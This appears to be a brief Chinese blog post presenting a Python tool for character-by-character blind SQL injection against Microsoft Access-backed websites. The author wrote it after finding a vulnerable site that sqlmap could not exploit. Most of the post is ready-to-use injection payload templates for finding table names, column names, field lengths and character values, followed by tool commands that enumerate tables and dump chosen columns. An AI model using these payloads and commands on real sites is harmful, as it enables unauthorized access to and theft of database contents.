ACCESS注入之逐字猜解法-Python工具

今天遇到一个站点，明显有sql注入，但是sqlmap就是跑不出来，测试可以用逐字猜解法法来进行注入，因此写这个工具，节约手工时间。

前置知识

获取表名：
and exists (select * from 表名)
获取列名：
and exists (select 列名 from 表名)
获取列名的长度：
and (select top 1 len(列名) from 表名)>=5
获取 第一位编码：
and (select top 1 asc(mid(列名,位数,1)) from 表)>=97
获取 第二位编码：
and (select top 1 asc(mid(列名,位数,1)) from 表)>=100

工具实现

用法及效果展示

注入表名：sql-injection.py -u url --tables --keyword=true_keywoed
注入列名：sql-injection.py -u url -T table_name --columns --keyword=true_keywoed
注入数据：sql-injection.py -u url -T table_name -C col1,col2 --dump --keyword=true_keywoed

代码地址

ACCESS-Injection